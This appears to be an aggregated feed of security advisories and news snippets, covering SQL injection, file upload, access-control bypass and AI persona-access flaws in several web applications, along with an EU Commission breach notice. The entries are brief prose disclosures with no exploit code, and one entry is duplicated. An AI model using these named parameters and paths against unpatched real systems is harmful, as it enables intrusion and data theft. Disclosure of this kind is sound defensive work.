European Commission Cyber-Attack Response

On 30 January, the European Commission's central infrastructure managing mobile devices identified traces of a cyber-attack, which may have resulted in access to staff names and mobile numbers of some of its staff members. The Commission's swift response ensured the incident was contained and the...

CVE-2025-68660 Discourse AI Discover's continue conversation allows threat actor to impersonate user

Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, an endpoint lets any authenticated user bypass the aidiscoverpersona access controls and gain ongoing DM access to personas that may be wired to staff-only categories, RAG document set...

CVE-2023-4558

A vulnerability classified as critical was found in SourceCodester Inventory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file staffdata.php. The manipulation of the argument columns0data leads to sql injection. The attack can be launched remotely. The...

CVE-2023-4558

A vulnerability classified as critical was found in SourceCodester Inventory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file staffdata.php. The manipulation of the argument columns0data leads to sql injection. The attack can be launched remotely. The...

PT-2023-29578 · Unknown · Sourcecodester Inventory Management System

Name of the Vulnerable Software and Affected Versions: SourceCodester Inventory Management System version 1.0 Description: A critical vulnerability was found in the SourceCodester Inventory Management System. The issue affects an unknown functionality of the file staff data.php. The manipulation ...

Inventory Management System SQL注入漏洞

Inventory Management System is an inventory management system by the individual developer of stemword. Inventory Management System version 1.0 suffers from a SQL injection vulnerability that stems from the parameter columns0data in the file staffdata.php, which can lead to sql injection...

PT-2023-24393 · Dolibarr · Dolibarr

Name of the Vulnerable Software and Affected Versions: Dolibarr versions 16.0.0 through 16.0.4 Description: An issue in Dolibarr allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact fil...

CVE-2022-32119

Arox School ERP Pro v1.0 was discovered to contain multiple arbitrary file upload vulnerabilities via the Add Photo function at photogalleries.inc.php and the import staff excel function at 1financemaster.inc.php...

Unauthorized Access Vulnerability in Kaixin File System Profile 30.0

Qixing File System Profile 30.0 is a system for managing employee files, contracts, training, personnel, attendance, payroll and other information within an organization. Kaixing File System Profile 30.0 suffers from an unauthorized access vulnerability that can be exploited by attackers to view...

CVE-2019-6126

The Admin Panel of PHP Scripts Mall Advance Peer to Peer MLM Script v1.7.0 allows remote attackers to bypass intended access restrictions by directly navigating to admin/dashboard.php or admin/user.php, as demonstrated by disclosure of information about users and staff...

iScripts AutoHoster - checktransferstatusbck.php SQL Injection

iScripts AutoHoster - checktransferstatusbck.php SQL Injection source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to...